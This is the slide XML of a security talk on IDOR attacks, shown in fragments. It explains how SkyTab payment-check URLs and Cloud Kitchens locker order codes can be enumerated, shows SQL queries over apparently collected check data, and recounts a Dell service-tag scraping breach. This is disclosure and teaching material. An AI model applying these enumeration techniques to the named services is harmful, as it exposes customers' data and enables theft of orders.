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0" r:id="rId3"/>
    <p:sldId id="263" r:id="rId4"/>
    <p:sldId id="266" r:id="rId5"/>
    <p:sldId id="296" r:id="rId6"/>
    <p:sldId id="298" r:id="rId7"/>
    <p:sldId id="297" r:id="rId8"/>
    <p:sldId id="301" r:id="rId9"/>
    <p:sldId id="267" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="269" r:id="rId12"/>
    <p:sldId id="274" r:id="rId13"/>
    <p:sldId id="275" r:id="rId14"/>
    <p:sldId id="278" r:id="rId15"/>
    <p:sldId id="282" r:id="rId16"/>
    <p:sldId id="279" r:id="rId17"/>
    <p:sldId id="280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9" r:id="rId26"/>
    <p:sldId id="293" r:id="rId27"/>
    <p:sldId id="291" r:id="rId28"/>
    <p:sldId id="294" r:id="rId29"/>
    <p:sldId id="295" r:id="rId30"/>
    <p:sldId id="305" r:id="rId31"/>
    <p:sldId id="306" r:id="rId32"/>
    <p:sldId id="303" r:id="rId33"/>
    <p:sldId id="304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35A6B"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="608D7E"/>
    <a:srgbClr val="E5B9C3"/>
    <a:srgbClr val="BDCA8B"/>
    <a:srgbClr val="86A69B"/>
    <a:srgbClr val="A25A6B"/>
    <a:srgbClr val="6E9169"/>
    <a:srgbClr val="A57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87426"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="129" d="100"/>
          <a:sy n="129" d="100"/>
        </p:scale>
        <p:origin x="1456" y="200"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="4200"/>
        <p:guide pos="3840"/>
        <p:guide orient="horz" pos="4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45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59EA38-3EDB-2C5B-D3FE-9691EB7E7F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5868F-A17F-D62E-F387-BA30F0940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299C1-C33B-7644-907C-2CE65BDEF153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ADC9B-8719-FD50-9B6A-0FE9B7D2B1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A9E682-AB9B-488F-374D-7217528362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624-AFC8-EA4C-9D00-89AAE7248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86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84BDA-D33E-4A5D-99DA-BF35310541D2}" type="datetimeFigureOut">
              <a:t>10/22/25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96787-FE5C-41BB-87A3-5D34509587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75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dirty="0" err="1"/>
              <a:t>skytap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&gt; SELECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    item-&gt;&gt;'name' AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>item_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    SUM((item-&gt;&gt;'quantity')::INTEGER) AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>total_quantity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FROM checks c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CROSS JOIN LATERAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsonb_array_elements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.check_details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-&gt;'checks') AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_obj</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CROSS JOIN LATERAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsonb_array_elements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-&gt;'items') AS item</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.check_details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> IS NOT NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AND NOT (item-&gt;&gt;'name' ILIKE ANY (ARRAY['COFFEE', 'SODA', 'WATER ONLY', 'JUICE', 'TAKE-OUT', 'CUP']))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GROUP BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>item_name</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>total_quantity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DESC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LIMIT 5;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SR EGG&amp;TOAST    |            321</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> AWFUL AWFUL REG |            295</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> TWO BY THREE    |            271</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SR CHZBRG CMB   |            191</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SR PANCAKE      |            170</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>skytap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&gt;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1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00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items in order.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>skytap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&gt; WITH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>order_item_counts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> AS (</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    SELECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.check_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-&gt;&gt;'id' AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        SUM((item-&gt;&gt;'quantity')::INTEGER) AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>total_items</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    FROM checks c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    CROSS JOIN LATERAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsonb_array_elements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.check_details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-&gt;'checks') AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_obj</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    CROSS JOIN LATERAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsonb_array_elements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-&gt;'items') AS item</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.check_details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> IS NOT NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    GROUP BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.check_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-&gt;&gt;'id'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>total_items</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DESC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    LIMIT 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.check_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-&gt;&gt;'id' AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    item-&gt;&gt;'name' AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>item_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    item-&gt;&gt;'quantity' AS quantity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FROM checks c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CROSS JOIN LATERAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsonb_array_elements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>c.check_details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-&gt;'checks') AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_obj</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CROSS JOIN LATERAL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>jsonb_array_elements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-&gt;'items') AS item</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-&gt;&gt;'id' IN (SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>check_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>order_item_counts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>);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ENG MUFFIN       | 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1286 | 2024-12-14 | 187-0-12142024 | TOAST 2 SLICES   | 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1286 | 2024-12-14 | 187-0-12142024 | WAFFLE CONE      | 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1286 | 2024-12-14 | 187-0-12142024 | SIDE SLAW        | 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1286 | 2024-12-14 | 187-0-12142024 | SIDE SLAW        | 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1286 | 2024-12-14 | 187-0-12142024 | SIDE SLAW        | 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1286 | 2024-12-14 | 187-0-12142024 | SIDE SLAW        | 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1286 | 2024-12-14 | 187-0-12142024 | SIDE SLAW        | 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1286 | 2024-12-14 | 187-0-12142024 | SIDE CURLY FRIES |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48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first glance this IDOR looks boring and mostly inaccessible (checks available between check close and payment). But a little patience and well thought out timing for the attacker can harvest sensitive data over time which may increase the potential impact for the vulnerable organization.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66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October, I went to Nashville for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07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night I ordered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> paneer from Devi's Indian Kitchen. The restaurant looked like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54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Inside the "restaurant" there were no people, just two groups of lockers. A1-G4 and H1-N4.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9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0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mobile-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface=".SF NS"/>
              </a:rPr>
              <a:t>checkin.cloudkitchens.com</a:t>
            </a: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/order/ZSXPLWM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mobile-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface=".SF NS"/>
              </a:rPr>
              <a:t>checkin.cloudkitchens.com</a:t>
            </a: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/order/LCVGQFW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mobile-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface=".SF NS"/>
              </a:rPr>
              <a:t>checkin.cloudkitchens.com</a:t>
            </a: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/order/YHVBGDZ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effectLst/>
              <a:latin typeface=".SF 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mobile-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface=".SF NS"/>
              </a:rPr>
              <a:t>checkin.cloudkitchens.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface=".SF NS"/>
              </a:rPr>
              <a:t>/order/PFFAEAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Nunito" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0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After redirect in JS, the browser inspector revealed https://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api.cloudkitchens.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0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/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checkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0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/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mci_order</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0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CODE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Nunito" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> as the API endpoint to validate the order code and open the locker.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8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3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May last year, to little apparent fanfare, Dell became the latest victim of customer PII disclosure attacks, where a threat actor claimed to harvest name and address information for 49M Dell customers.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Threat actor: Menelik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Created a Dell Partner account (no cost, no identity verification, no KYC)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Identified a Dell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>service tag lookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> feature (7 "digits and consonants" 🤷‍♂️)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2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53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F9F15-52B3-4963-7634-6AB404EFC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7EC15-3750-AF14-8BBB-785E0E4C5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37617-ABDC-686E-2C77-854C27847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52 lockers in each of the 91 Cloud Kitchen locations (which is a big assumption).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C5CFE-DF11-9B9B-F286-B1DF53581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3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03802-1634-9805-2346-EB573C7B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E0AA0D-2B6D-3237-350E-BD2FE3F50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82994-70B5-B255-8F29-4A67F7A87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68A1B-58AE-4240-D0A2-C21C58AC9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68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6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17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85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66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72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8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93448-4E4D-024F-655E-283188098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D111BF-E9B3-193E-8DCF-EC8F24380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D6A6D-D431-4921-7421-C43B34972D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2E10F-D9BF-EABD-CCDB-186D44757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6787-FE5C-41BB-87A3-5D34509587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2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9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35" y="268015"/>
            <a:ext cx="10890929" cy="10972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671145"/>
            <a:ext cx="10890928" cy="4528487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521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35" y="268015"/>
            <a:ext cx="10890929" cy="10972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38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keyboard&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31AA91DD-B55B-C0DA-9A04-6DFC326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7907079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51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0"/>
            <a:ext cx="10890929" cy="3478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4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keyboard&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{014032F5-3FC4-3997-812B-B896CCB3D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0"/>
            <a:ext cx="10890929" cy="3478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66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6048588" cy="3478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4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53114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007476"/>
            <a:ext cx="10890928" cy="4192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30999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1" r:id="rId3"/>
    <p:sldLayoutId id="2147483675" r:id="rId4"/>
    <p:sldLayoutId id="2147483678" r:id="rId5"/>
    <p:sldLayoutId id="2147483680" r:id="rId6"/>
    <p:sldLayoutId id="2147483682" r:id="rId7"/>
    <p:sldLayoutId id="2147483679" r:id="rId8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F2CC-573C-52D8-5CA4-4B392AE5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err="1">
                <a:latin typeface="Grandview" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Grandview" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hackventures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0">
                <a:latin typeface="Grandview" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Grandview" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> with Josh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2B728-0556-C6A7-C999-333566522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dirty="0"/>
              <a:t>Having Fun with IDOR Attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Joshua Wright | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>josh@willhackforsushi.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5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BB7B36B-8B8B-D673-A0B0-BE047E336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392" y="3884255"/>
            <a:ext cx="2095719" cy="20136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2659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een sign&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0D8A69B-2487-156E-F708-59417CD20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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3841921" y="0"/>
            <a:ext cx="3430248" cy="6869230"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a menu&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7688B200-D342-A4B5-2119-B53BA198B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-1020" b="7608"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="245885" y="0"/>
            <a:ext cx="3430248" cy="6869230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9FD63346-8BAD-3BDB-F167-DCBD232FBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7590621" y="853807"/>
            <a:ext cx="4285561" cy="41919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QR code URL shows check details and payment options.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C1BFB0-A07F-BF39-91CD-1CA7EFC84E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7590621" y="3854830"/>
            <a:ext cx="41136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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>pay.skytab.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>/badbe1/10/10-0-12052024</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124256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3EFD9-534B-7AF9-73DC-7531B664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7" y="177771"/>
            <a:ext cx="11902807" cy="650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AC87-37D7-1001-69CD-20E13CB5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SkyTab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> IDOR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3ACD-5E7B-F431-6823-A1AD05EA5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Location code is 6 hex characters (16.7 M unique values, can observe a location code by looking at any valid check)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every day, check numbers reset for each location code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each check number is accessible when the check is closed by waitstaff until payment (about 1-10 minutes)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Checks disclose order details, server name, date/time, table number, and more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BCD79-2CB2-0492-4BF3-E17600F6ABF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650535" y="964222"/>
            <a:ext cx="10587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ea typeface="DejaVuSansM Nerd Font Mono" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
